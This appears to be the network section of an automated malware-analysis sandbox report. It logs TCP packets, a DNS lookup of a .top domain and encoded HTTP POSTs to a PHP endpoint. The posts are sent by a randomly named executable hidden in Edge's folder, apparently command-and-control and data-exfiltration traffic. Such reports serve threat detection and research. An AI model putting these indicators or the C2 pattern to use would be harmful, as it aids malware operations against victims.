                                                                                                                      Dec 20, 2024 21:19:03.359677076 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.359723091 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.360332966 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.360419035 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.360683918 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.480762959 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.707406044 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.826984882 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.827177048 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.827224970 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.051035881 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.054982901 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.174480915 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.410558939 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.473906994 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.519812107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.530268908 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.530330896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.631318092 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.676064014 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.864053965 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.910451889 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.986769915 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.987562895 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.106534958 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.106703997 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.107156992 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.107233047 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.107431889 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.196027040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.197107077 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.226891041 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.316528082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.458259106 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.551542044 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.578016043 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.578027010 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.578083038 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.603972912 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.644787073 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.671188116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.671196938 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.383505106 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.390378952 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.391186953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.426136017 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.510945082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.616213083 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.660418987 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.736040115 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.736596107 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.740051985 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.797950983 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.848037958 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856179953 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.856256962 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856317997 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.856408119 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856707096 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.859775066 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.859854937 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.976238966 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.207386017 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.327073097 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.327086926 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.327104092 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.520291090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.521712065 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.641469955 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.879290104 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.928395033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.972929955 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.999397993 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.999442101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.127427101 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.176141977 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.364594936 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.410525084 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.487819910 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.489484072 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.607454062 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.607590914 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.608915091 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.610306025 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.610519886 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.657363892 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.659593105 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.730113983 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.779086113 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.957770109 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.004285097 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.077552080 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.077611923 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.077641964 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.084177971 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.123972893 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.124123096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.129173994 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.775857925 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.776954889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.881637096 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.898849964 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.926294088 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.116483927 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.130251884 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.160451889 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.187144995 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.238564014 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.238570929 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.242077112 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.249804974 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.249917030 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.358705044 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.359121084 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.361643076 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.361809969 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.362140894 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.481576920 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.737970114 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.990228891 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.106903076 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.106914043 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.106923103 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.107099056 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.109719038 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.110819101 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.231657982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.457765102 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.519325018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.566687107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.577449083 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.577457905 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.634597063 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.676045895 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.872221947 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.926054955 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.978599072 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.980199099 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.994209051 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.995505095 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.100110054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.114412069 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.114517927 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.115277052 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.118818998 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.122773886 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.242414951 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.332703114 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.386504889 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.441701889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.452394009 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.452451944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.473037958 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.592888117 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.592902899 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.592911005 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.112950087 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.116998911 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.236531019 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.391532898 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.441672087 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.473279953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.523823977 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.566660881 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.592801094 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.592950106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.625479937 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.676095963 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.763510942 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.764532089 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.884049892 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.884107113 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.884159088 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.884236097 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.884423018 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:14.003973007 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:14.246970892 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:14.301064014 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:15.155226946 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:15.207283020 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:19.673058033 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:19.683670044 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:19.792936087 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:19.792944908 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:19.793066025 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:19.803256035 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.035505056 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:20.093246937 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.144783974 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:20.148821115 CET804996937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.155057907 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.155163050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.191668987 CET4996980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:20.804892063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:20.847929955 CET4973280192.168.2.437.44.238.250

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 20, 2024 21:17:25.979603052 CET5108253192.168.2.41.1.1.1
                                                                                                                      Dec 20, 2024 21:17:26.453417063 CET53510821.1.1.1192.168.2.4

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 20, 2024 21:17:25.979603052 CET192.168.2.41.1.1.10x6d3eStandard query (0)703648cm.renyash.topA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 20, 2024 21:17:26.453417063 CET1.1.1.1192.168.2.40x6d3eNo error (0)703648cm.renyash.top37.44.238.250A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • 703648cm.renyash.top

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.44973237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:26.583430052 CET311OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 344
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 20, 2024 21:17:26.942862988 CET344OUTData Raw: 00 04 04 02 06 0e 04 06 05 06 02 01 02 03 01 03 00 07 05 09 02 03 03 09 03 03 0e 02 07 03 01 04 0c 03 06 0d 03 04 06 51 0f 02 04 06 04 0a 07 52 05 03 0e 0d 0d 57 01 0b 04 54 07 07 04 04 05 00 00 50 0a 0f 00 01 06 09 0f 0e 0e 0e 0f 04 0c 03 07 53
                                                                                                                      Data Ascii: QRWTPSZ_R\L}Tkp[]t~^aecR~l[cRo\h]{XxBx`jK|m`Awc^je~V@x}fN~Lu
                                                                                                                      Dec 20, 2024 21:17:27.859644890 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:27.932555914 CET1236INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:26 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 1344
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 56 4a 7d 59 6c 6d 74 5b 7b 72 7b 5b 7e 71 51 03 7e 77 64 50 7c 60 71 4f 7b 63 52 06 7d 5c 51 59 60 63 5c 50 6d 62 65 06 75 58 64 07 7e 61 78 01 55 4b 72 51 74 62 70 5e 7f 62 54 5d 68 77 72 0b 7b 48 78 41 7e 73 6b 03 61 62 54 5e 63 5f 5b 04 68 4f 50 04 7e 6c 64 08 6a 77 67 4a 75 76 7b 06 7c 5c 71 03 7e 06 61 4a 6f 49 6b 58 6f 67 7f 59 6f 6d 7f 00 78 61 6f 5d 6c 5a 71 5e 7d 73 73 5e 78 74 70 06 7d 62 64 5c 62 61 6f 5c 7a 51 41 5b 7f 67 77 50 7d 62 61 4e 76 55 7c 07 6c 6f 67 59 63 59 6d 53 7a 07 71 00 69 7c 5f 5f 7b 71 58 48 75 73 6f 00 75 71 56 05 77 71 5c 50 7e 5d 79 5f 60 5b 7d 06 76 65 5e 09 68 52 65 04 60 6f 68 04 7f 5d 6c 00 78 6f 73 03 7b 06 76 02 7c 6d 7b 51 77 77 6f 5e 69 62 6e 09 7e 53 7b 0b 7b 6d 5b 5b 7f 72 61 4f 7b 5d 46 51 7c 42 55 50 7e 06 64 40 7d 67 66 4c 78 43 73 06 6f 62 7c 05 68 4f 67 01 7d 77 52 53 7f 73 62 52 7a 5d 7c 4d 7f 62 74 05 76 73 79 51 7b 5c 79 07 76 66 64 4b 7c 66 68 06 7d 48 75 09 77 4c 77 02 7f 5c 71 4c 7d 77 54 09 79 66 78 4f 7d 4d 67 03 75 4c 5b 02 77 61 53 49 7c 61 [TRUNCATED]
                                                                                                                      Data Ascii: VJ}Ylmt[{r{[~qQ~wdP|`qO{cR}\QY`c\PmbeuXd~axUKrQtbp^bT]hwr{HxA~skabT^c_[hOP~ldjwgJuv{|\q~aJoIkXogYomxao]lZq^}ss^xtp}bd\bao\zQA[gwP}baNvU|logYcYmSzqi|__{qXHusouqVwq\P~]y_`[}ve^hRe`oh]lxos{v|m{Qwwo^ibn~S{{m[[raO{]FQ|BUP~d@}gfLxCsob|hOg}wRSsbRz]|MbtvsyQ{\yvfdK|fh}HuwLw\qL}wTyfxO}MguL[waSI|aPF||}YcIu_QH{b_~`yxIt{YtxCQyb|{snL}`^yw^D|bgvOdH~lcEYha_w|x{lxFv`PzOe|lP{qTucgvqpAw_v`~NtbyOu[`O|ByMtRZ|slK{RozpjCRtI`Lbf}CozmvO}by}p|BBtA}NR}YTxmUyr`F~qs}YQO`uyc`O}LpIvc}yOuufp~fZ~fqtrU|\y|YXxXh}]cGu\[Ow_aG|q~H~Bp~IwaIxbaI|`uxw`xwl{}UFyb|Fzcr{]NZxdg_jbd[u_`jBl^|IcSO_Auo\{Uk]vczyqW~lT_z\yvxBagx[L~Jx^Pw[aweQT~bXwUk^~csX{B]xpbI}cTcwpNi[eRzSYQVq}@T[\\hl{{k`wUbswjdODoTdbU[]hm`_itSYHNm`kOy_BXvpe@zq[uu`jH|M~H_O`wJk\yM|tzAoXhicpXbq}_v[KYkeGSMj^F`x\Vnn\PiZyZpzYhzSwHzOIzs\_~ws]ldDQ~`YYbVjZW`x{^U\A{lW{CpqyIP}_Y{yXobFZ`]YbPZXaWPcBp\W\l\ox~\CZUJ\}ts]loEW|e]Sn_Z^oXQaMbSoj~y_yD [TRUNCATED]
                                                                                                                      Dec 20, 2024 21:17:27.932585955 CET265INData Raw: 4a 57 63 7e 43 68 74 66 50 79 5b 73 6e 66 4e 7b 43 71 5b 5c 5a 5b 06 7a 43 55 62 57 41 52 54 0c 53 52 00 64 46 5c 7d 78 05 61 5b 7e 44 69 67 71 05 7f 5f 6f 41 57 6b 6b 59 6c 7a 70 65 53 71 73 01 6f 6f 7a 51 50 06 60 54 67 64 04 5f 50 5b 5a 5d 61
                                                                                                                      Data Ascii: JWc~ChtfPy[snfN{Cq[\Z[zCUbWARTSRdF\}xa[~Digq_oAWkkYlzpeSqsoozQP`Tgd_P[Z]af|CzUR^PsKVbPIZT\WXcUV[ftQaZ|_\Xq^AZbc@ZrOk_BavCZ_kHSUf@]}]S`lZyQ[ywy]hnN[{oXQa^Q~pTaejqe^}]xQ~{sWjcOQ{aZTnUTqDk^WddTx^_Q}^N\jcGZpHn\F`
                                                                                                                      Dec 20, 2024 21:17:28.087202072 CET287OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 384
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:28.444823027 CET384OUTData Raw: 58 58 5f 5e 5d 5f 54 55 5a 5b 5b 52 55 50 51 51 58 5d 59 43 52 55 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_^]_TUZ[[RUPQQX]YCRUT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G*>0)3[0X::;%X *%=$/Z'!?"?Q&80#19U0>#G!"^,
                                                                                                                      Dec 20, 2024 21:17:28.494035959 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:28.923033953 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 34 38 2e 55 27 11 39 51 2b 20 3b 1f 31 3f 3f 42 2e 20 25 05 26 00 22 01 2a 3b 2e 15 29 0d 32 07 26 0a 3d 54 30 3e 27 1e 25 24 2b 51 03 10 22 59 25 2d 0f 00 30 01 02 56 24 33 24 58 36 10 38 43 36 30 26 57 23 3a 39 54 24 3d 2e 09 3d 29 2a 02 2b 34 28 18 3c 0f 2b 1b 2a 3d 20 52 09 16 25 09 2a 06 3f 0f 33 01 24 51 29 3e 27 06 32 38 3e 09 3e 04 29 0c 2a 3e 05 0b 3e 01 34 50 25 23 21 04 2a 5c 26 04 31 3a 3b 09 24 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &48.U'9Q+ ;1??B. %&"*;.)2&=T0>'%$+Q"Y%-0V$3$X68C60&W#:9T$=.=)*+4(<+*= R%*?3$Q)>'28>>)*>>4P%#!*\&1:;$(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:28.953802109 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 1512
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:29.301213026 CET1512OUTData Raw: 58 5b 5f 55 58 5b 54 50 5a 5b 5b 52 55 57 51 5d 58 52 59 46 52 54 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X[_UX[TPZ[[RUWQ]XRYFRTTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!==#X*09[$%-+X!)&*'7$;*+&;52%$#G!"^,
                                                                                                                      Dec 20, 2024 21:17:29.361124992 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:30.081082106 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
